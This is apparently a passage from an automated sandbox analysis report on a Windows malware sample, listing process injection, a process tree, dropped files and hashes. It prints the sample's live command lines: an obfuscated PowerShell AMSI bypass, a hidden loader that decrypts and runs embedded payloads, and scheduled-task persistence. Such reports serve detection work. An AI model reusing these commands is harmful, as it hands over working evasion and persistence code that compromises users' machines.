of 1092 3964 powershell.exe install.exe PID 3964 wrote to memory of 1092 3964 powershell.exe install.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 2028 wrote to memory of 3984 2028 powershell.EXE dllhost.exe PID 3984 wrote to memory of 608 3984 dllhost.exe winlogon.exe PID 3984 wrote to memory of 664 3984 dllhost.exe lsass.exe PID 3984 wrote to memory of 948 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 316 3984 dllhost.exe dwm.exe PID 3984 wrote to memory of 388 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 860 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1112 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1124 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1140 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1216 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1244 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1328 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1340 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1368 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1436 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1528 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1540 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1672 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1680 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1740 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1772 3984 dllhost.exe svchost.exe PID 3984 wrote to memory of 1864 3984 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{303e1b26-3a19-47f2-aad5-23d7db68d203}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cnqdbBaiGAXP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KpzSPJbAdTzAHH,[Parameter(Position=1)][Type]$GregwOKiai)$uSALalfxawY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'cted'+'D'+''+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+',P'+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'al'+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$uSALalfxawY.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KpzSPJbAdTzAHH).SetImplementationFlags(''+'R'+'unt'+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+'a'+'n'+''+[Char](97)+'g'+[Char](101)+'d');$uSALalfxawY.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+'ByS'+'i'+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'ual',$GregwOKiai,$KpzSPJbAdTzAHH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'na'+'g'+''+'e'+''+[Char](100)+'');Write-Output $uSALalfxawY.CreateType();}$NlOcHoaPLzzgK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'o'+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+'n'+'3'+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+'a'+'f'+''+'e'+''+'N'+''+'a'+''+[Char](116)+''+'i'+'v'+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$PugYshjgDccQab=$NlOcHoaPLzzgK.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EEeskrOKnWqvDcguYBf=cnqdbBaiGAXP @([String])([IntPtr]);$fkKcAxKdEtyxIvUzYnbzlz=cnqdbBaiGAXP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tlawjsEqJnG=$NlOcHoaPLzzgK.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$xaZUnzGTqaJEsH=$PugYshjgDccQab.Invoke($Null,@([Object]$tlawjsEqJnG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+[Char](105)+'bra'+[Char](114)+'yA')));$KGeqzfaDzYxzPGDYf=$PugYshjgDccQab.Invoke($Null,@([Object]$tlawjsEqJnG,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ect')));$KFkPgoM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xaZUnzGTqaJEsH,$EEeskrOKnWqvDcguYBf).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$uXlzvfJVKrrwBUesW=$PugYshjgDccQab.Invoke($Null,@([Object]$KFkPgoM,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+''+[Char](99)+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$RpInXiWhNQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KGeqzfaDzYxzPGDYf,$fkKcAxKdEtyxIvUzYnbzlz).Invoke($uXlzvfJVKrrwBUesW,[uint32]8,4,[ref]$RpInXiWhNQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uXlzvfJVKrrwBUesW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KGeqzfaDzYxzPGDYf,$fkKcAxKdEtyxIvUzYnbzlz).Invoke($uXlzvfJVKrrwBUesW,[uint32]8,0x20,[ref]$RpInXiWhNQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_989_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_989.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_989.vbs"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_989.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 file7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_989.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_989.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"7⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"7⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe d72ea9721f25e85977829f815956e0a6 WbXx2TyFNkCqj/CtXs7HVg.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD555d32bc1c206428fe659912b361362de
SHA17056271e5cf73b03bafc4e616a0bc5a4cffc810f
SHA25637bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
SHA5122602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD57eaeaf6bfd54799a8c15b2cf0c6f6683
SHA14238058d1ef94e3ce9bb0a6133ccd16fa7df390b
SHA2564f7ae38acd9e5de90f0ce83486e3d6804e570c3b750838c42c9872b56e11f503
SHA51207ee6c01404a945b5285984f4b73046325b2031b6d8632ce68d4dee0ff14e9bfd1a19268f4de5816316119a5c53944fbad103f1288eb6b4ef94425831e9b3c3c
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ghqdu34h.luu.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Roaming\startup_str_989.batFilesize
515KB
MD54c2a3be3d5c9464eb441677e41f44fd8
SHA1c826034a0882d21a39056d745e88622ee9698343
SHA25645e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
-
C:\Users\Admin\AppData\Roaming\startup_str_989.vbsFilesize
115B
MD50b3bda6ffdd71ff9dd00514a34179cf6
SHA1565b45f04f7479f230a9996678243aaef3100664
SHA2569a59ab294ccbce72f42c2c00d73c96ca5659d1296e0e96bb60adca192664c6ad
SHA5124bf8d9cb3d6317bdec522f0609b24dc8750b0aad258990c779cfb311e8d0a3bb462b2306bbf6a2bd89ac6aaa4f13dfd51c811e2495d7548e94223a21a265420a
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
